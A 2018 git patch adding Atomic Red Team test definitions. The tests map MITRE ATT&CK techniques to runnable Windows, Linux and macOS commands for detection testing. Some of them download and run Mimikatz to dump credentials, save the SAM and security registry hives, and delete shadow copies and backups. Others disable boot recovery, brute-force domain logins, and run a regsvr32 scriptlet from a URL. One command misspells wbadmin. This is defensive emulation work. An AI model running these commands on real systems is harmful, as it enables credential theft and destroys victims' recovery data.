From 0f7771e77d0bc788d441eafa76b4047900a157a0 Mon Sep 17 00:00:00 2001
From: Brian Beyer <brian@redcanary.com>
Date: Fri, 11 May 2018 10:55:24 +0200
Subject: [PATCH] add atomics from yaml-cs branch

---
 atomics/t1002/t1002.yaml   |  43 ++++++++++
 atomics/t1003/t1003.yaml   |  58 ++++++++++++++
 atomics/t1107/t1107.yaml   | 155 +++++++++++++++++++++++++++++++++++++
 atomics/t1110/t1110.yaml   |  35 +++++++++
 atomics/t1113/t1113.yaml   |  66 ++++++++++++++++
 atomics/t1115/t1115.yaml   |  27 +++++++
 atomics/t1117/RegSvr32.sct |  23 ++++++
 atomics/t1117/t1117.yaml   |  45 +++++++++++
 atomics/t1123/t1123.yaml   |   2 +-
 atomics/t1146/t1146.yaml   |   4 +-
 atomics/t1158/t1158.yaml   |   4 +-
 11 files changed, 457 insertions(+), 5 deletions(-)
 create mode 100644 atomics/t1002/t1002.yaml
 create mode 100644 atomics/t1003/t1003.yaml
 create mode 100644 atomics/t1107/t1107.yaml
 create mode 100644 atomics/t1110/t1110.yaml
 create mode 100644 atomics/t1113/t1113.yaml
 create mode 100644 atomics/t1115/t1115.yaml
 create mode 100644 atomics/t1117/RegSvr32.sct
 create mode 100644 atomics/t1117/t1117.yaml

diff --git a/atomics/t1002/t1002.yaml b/atomics/t1002/t1002.yaml
new file mode 100644
index 00000000..d7448dbd
--- /dev/null
+++ b/atomics/t1002/t1002.yaml
@@ -0,0 +1,43 @@
+---
+attack_technique: T1002
+display_name: Data Compressed
+
+atomic_tests:
+- name: Compress Data for Exfiltration With PowerShell
+  description: |
+    TODO
+  supported_platforms:
+    - windows
+  input_arguments:
+    input_file:
+      description: Path that should be compressed into our output file
+      type: Path
+      default: C:\*
+    output_file:
+      description: Path where resulting compressed data should be placed
+      type: Path
+      default: C:\test\Data.zip
+  executor: 
+    name: powershell
+    command: |
+      dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
+
+- name: Compress Data for Exfiltration With Rar
+  description: |
+    TODO
+  supported_platforms:
+    - windows
+  input_argument:
+    input_file:
+      description: Path that should be compressed into our output file
+      type: Path
+      default: "*.docx"
+    output_file:
+      description: Path where resulting compressed data should be placed
+      type: Path
+      default: exfilthis.rar
+  executor: 
+    name: powershell
+    command: |
+      rar a -r #{output_file} #{input_file}
+  
\ No newline at end of file
diff --git a/atomics/t1003/t1003.yaml b/atomics/t1003/t1003.yaml
new file mode 100644
index 00000000..2226eac7
--- /dev/null
+++ b/atomics/t1003/t1003.yaml
@@ -0,0 +1,58 @@
+---
+attack_technique: T1003
+display_name: Credential Dumping
+
+atomic_tests:
+- name: Powershell Mimikatz
+  description: |
+    Dumps Credentials via Powershell by invoking a remote mimikatz script
+  supported_platforms:
+    - windows
+  input_arguments:
+    remote_script:
+      description: URL to a remote Mimikatz script that dumps credentials
+      type: Url
+      default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
+  executor: 
+    name: powershell
+    command: |
+      IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
+
+- name: Gsecdump
+  description: |
+    https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
+  supported_platforms:
+    - windows
+  executor: 
+    name: command_prompt
+    command: |
+      gsecdump -a
+
+- name: Windows Credential Editor
+  description: |
+    http://www.ampliasecurity.com/research/windows-credentials-editor/
+  supported_platforms:
+    - windows
+  input_argument:
+    output_file:
+      description: Path where resulting data should be placed
+      type: Path
+      default: output.txt
+  executor: 
+    name: command_prompt
+    command: |
+      wce -o #{output_file}
+
+- name: Registry dump of SAM, creds, and secrets
+  description: |
+    Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated 
+    via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
+  supported_platforms:
+    - windows
+  executor: 
+    name: command_prompt
+    command: |
+      reg save HKLM\sam sam 
+      reg save HKLM\system system
+      reg save HKLM\security security
+
diff --git a/atomics/t1107/t1107.yaml b/atomics/t1107/t1107.yaml
new file mode 100644
index 00000000..0f8baae8
--- /dev/null
+++ b/atomics/t1107/t1107.yaml
@@ -0,0 +1,155 @@
+---
+attack_technique: T1107
+display_name: File Deletion
+
+atomic_tests:
+- name: Victim configuration
+  description: |
+    Create a temporary directory and several files on the victim system for later deletion
+  supported_platforms:
+    - linux
+  executor:
+    name: sh
+    command: |
+      mkdir /tmp/victim-files
+      cd /tmp/victim-files
+      touch a b c d e f g
+      echo "This file will be shredded" > /tmp/victim-shred.txt
+
+- name: Delete a single file
+  description: |
+    Delete a single file from the temporary directory
+  supported_platforms:
+    - linux
+  executor:
+    name: sh
+    command: |
+      rm -f /tmp/victim-files/a
+
+- name: Delete an entire folder
+  description: |
+    Recursively delete the temporary directory and all files contained within it
+  supported_platforms:
+    - linux
+  executor:
+    name: sh
+    command: |
+      rm -rf /tmp/victim-files
+
+- name: Overwrite and delete a file with shred
+  description: |
+    Use the `shred` command to overwrite the temporary file and then delete it
+  supported_platforms:
+    - linux
+  executor:
+    name: sh
+    command: |
+      shred -u /tmp/victim-shred.txt
+
+- name: Victim configuration
+  description: |
+    Create a temporary directory and several files on the victim system for later deletion
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      mkdir %TEMP%\victim-files-cmd
+      cd %TEMP%\victim-files-cmd
+      type nul > a
+      type nul > b
+      type nul > c
+      type nul > d
+      type nul > e
+      type nul > f
+      type nul > g
+      mkdir %TEMP%\victim-files-ps
+      cd %TEMP%\victim-files-ps
+      type nul > a
+      type nul > b
+      type nul > c
+      type nul > d
+      type nul > e
+      type nul > f
+      type nul > g
+
+- name: Delete a single file - cmd
+  description: |
+    Delete a single file from the temporary directory using cmd.exe
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      del /f %TEMP%\victim-files-cmd\a
+
+- name: Delete an entire folder - cmd
+  description: |
+    Recursively delete the temporary directory and all files contained within it using cmd.exe
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      del /f /S %TEMP%\victim-files-cmd
+
+- name: Delete a single file - ps
+  description: |
+    Delete a single file from the temporary directory using Powershell
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    command: |
+      Remove-Item -path %TEMP%\victim-files-ps\a
+
+- name: Delete an entire folder - ps
+  description: |
+    Recursively delete the temporary directory and all files contained within it using Powershell
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    command: |
+      Remove-Item -path %TEMP%\victim-files-ps -recurse
+
+- name: Delete VSS - vssadmin
+  description: |
+    Delete all volume shadow copies with vssadmin.exe
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      vssadmin.exe Delete Shadows /All /Quiet
+
+- name: Delete VSS - wmic
+  description: |
+    Delete all volume shadow copies with wmic
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      wmic shadowcopy delete
+
+- name: bcdedit
+  description: |
+    xxx
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      bcdedit /set {default} bootstatuspolicy ignoreallfailures
+      bcdedit /set {default} recoveryenabled no
+
+- name: wbadmin
+  description: |
+    xxx
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      wbdadmin delete catalog -quiet
\ No newline at end of file
diff --git a/atomics/t1110/t1110.yaml b/atomics/t1110/t1110.yaml
new file mode 100644
index 00000000..c04adfb5
--- /dev/null
+++ b/atomics/t1110/t1110.yaml
@@ -0,0 +1,35 @@
+---
+attack_technique: T1110
+display_name: Brute Force Credential Access
+
+atomic_tests:
+- name: Brute Force Credentials
+  description: |
+    Creates username and password files then attempts to brute force on remote host
+  supported_platforms:
+    - windows
+  input_arguments:
+    input_file_users:
+      description: Path to a file containing a list of users that we will attempt to brute force
+      type: Path
+      default: DomainUsers.txt
+    input_file_passwords:
+      description: Path to a file containing a list of passwords we will attempt to brute force with
+      type: Path
+      default: passwords.txt
+    remote_host:
+      description: Hostname of the target system we will brute force upon 
+      type: String
+      default: \\COMPANYDC1\IPC$
+    domain:
+      description: Domain name of the target system we will brute force upon 
+      type: String
+      default: YOUR_COMPANY
+  executor: 
+    name: command_prompt
+    command: |
+      net user /domain > #{input_file_users}
+      echo "Password1" >> #{input_file_passwords}
+      echo "1q2w3e4r" >> #{input_file_passwords}
+      echo "Password!" >> #{input_file_passwords}
+      @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
\ No newline at end of file
diff --git a/atomics/t1113/t1113.yaml b/atomics/t1113/t1113.yaml
new file mode 100644
index 00000000..e365b5dd
--- /dev/null
+++ b/atomics/t1113/t1113.yaml
@@ -0,0 +1,66 @@
+---
+attack_technique: T1113
+display_name: Screen Capture
+
+atomic_tests:
+- name: Screencapture
+  description: |
+    Use screencapture command to collect a full desktop screenshot
+  supported_platforms:
+    - macos
+  input_arguments:
+    output_file:
+      description: |
+        xxx
+      type: Path
+      default: desktop.png
+  executor:
+    name: bash
+    command: screencapture #{output_file}
+
+- name: Screencapture (silent)
+  description: |
+    Use screencapture command to collect a full desktop screenshot
+  supported_platforms:
+    - macos
+  input_arguments:
+    output_file:
+      description: |
+        xxx
+      type: Path
+      default: desktop.png
+  executor:
+    name: bash
+    command: screencapture -x #{output_file}
+
+- name: X Windows Capture
+  description: |
+    Use xwd command to collect a full desktop screenshot and review file with xwud
+  supported_platforms:
+    - linux
+  input_arguments:
+    output_file:
+      description: |
+        xxx
+      type: Path
+      default: desktop.xwd
+  executor:
+    name: bash
+    command: |
+      xwd -root -out #{output_file}
+      xwud -in #{output_file}
+
+- name: Import
+  description: |
+    Use import command to collect a full desktop screenshot
+  supported_platforms:
+    - linux
+  input_arguments:
+    output_file:
+      description: |
+        xxx
+      type: Path
+      default: desktop.png
+  executor:
+    name: bash
+    command: import -window root #{output_file}
\ No newline at end of file
diff --git a/atomics/t1115/t1115.yaml b/atomics/t1115/t1115.yaml
new file mode 100644
index 00000000..1a6208ff
--- /dev/null
+++ b/atomics/t1115/t1115.yaml
@@ -0,0 +1,27 @@
+---
+attack_technique: T1115
+display_name: Clipboard Data
+attack_link: https://attack.mitre.org/wiki/Technique/T1115
+
+atomic_tests:
+- name: Utilize Clipboard to store or execute commands from
+  description: |
+    Add data to clipboard to copy off or execute commands from.
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      dir | clip
+      clip < readme.txt
+
+- name: PowerShell
+  description: |
+    Utilize PowerShell to echo a command to clipboard and execute it
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    command: |
+      echo Get-Process | clip
+      Get-Clipboard | iex
\ No newline at end of file
diff --git a/atomics/t1117/RegSvr32.sct b/atomics/t1117/RegSvr32.sct
new file mode 100644
index 00000000..697938ed
--- /dev/null
+++ b/atomics/t1117/RegSvr32.sct
@@ -0,0 +1,23 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
+
+	<!-- .sct files when downloaded, are executed from a path like this -->
+	<!-- Please Note, file extenstion does not matter -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+  	<!-- You can either execute locally, or from a url -->
+	<script language="JScript">
+		<![CDATA[
+	    		// calc.exe should launch, this could be any arbitrary code.
+      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
+	
+		]]>
+</script>
+</registration>
+</scriptlet>
diff --git a/atomics/t1117/t1117.yaml b/atomics/t1117/t1117.yaml
new file mode 100644
index 00000000..6d2b88bb
--- /dev/null
+++ b/atomics/t1117/t1117.yaml
@@ -0,0 +1,45 @@
+attack_technique: T1117
+display_name: Regsvr32
+atomic_tests:
+- name: Regsvr32 local COM scriptlet execution
+  description: |
+    Regsvr32.exe is a command-line program used to register and unregister OLE controls
+  supported_platforms:
+  - windows
+  input_arguments:
+   filename:
+    description: Name of the local file, include path.
+    type: Path
+    default: Regsvr32.sct
+  executor:
+   name: command_prompt
+   command: |
+    regsvr32.exe /s /u /i:#{filename} scrobj.dll
+- name: Regsvr32 remote COM scriptlet execution
+  description: |
+    Regsvr32.exe is a command-line program used to register and unregister OLE controls
+  supported_platforms:
+  - windows
+  input_arguments:
+   url:
+    description: URL to hosted sct file
+    type: Url
+    default: http://www.example.com/file.sct
+  executor:
+   name: command_prompt
+   command: |
+    regsvr32.exe /s /u /i:#{url} scrobj.dll
+- name: Regsvr32 local DLL execution
+  description: |
+    Regsvr32.exe is a command-line program used to register and unregister OLE controls
+  supported_platforms:
+  - windows
+  input_arguments:
+   dll_name:
+    description: Name of DLL to Execute, DLL Should export DllRegisterServer
+    type: Path
+    default: payload.dll
+  executor:
+   name: command_prompt
+   command: |
+    regsvr32.exe {dll_name}
diff --git a/atomics/t1123/t1123.yaml b/atomics/t1123/t1123.yaml
index d90a15ae..f3365800 100644
--- a/atomics/t1123/t1123.yaml
+++ b/atomics/t1123/t1123.yaml
@@ -34,4 +34,4 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
+      powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
\ No newline at end of file
diff --git a/atomics/t1146/t1146.yaml b/atomics/t1146/t1146.yaml
index 6ebd6942..79e22114 100644
--- a/atomics/t1146/t1146.yaml
+++ b/atomics/t1146/t1146.yaml
@@ -1,7 +1,7 @@
 ---
-attack_technique: t1146
+attack_technique: T1146
 display_name: Clear Command History
-  
+
 atomic_tests:
 - name: Clear Bash history (rm)
   description: |
diff --git a/atomics/t1158/t1158.yaml b/atomics/t1158/t1158.yaml
index a999c506..7d352fca 100644
--- a/atomics/t1158/t1158.yaml
+++ b/atomics/t1158/t1158.yaml
@@ -1,7 +1,7 @@
 ---
-attack_technique: t1158
+attack_technique: T1158
 display_name: Hidden Files and Directories
-  
+
 atomic_tests:
 - name: Create a hidden file in a hidden directory
   description: |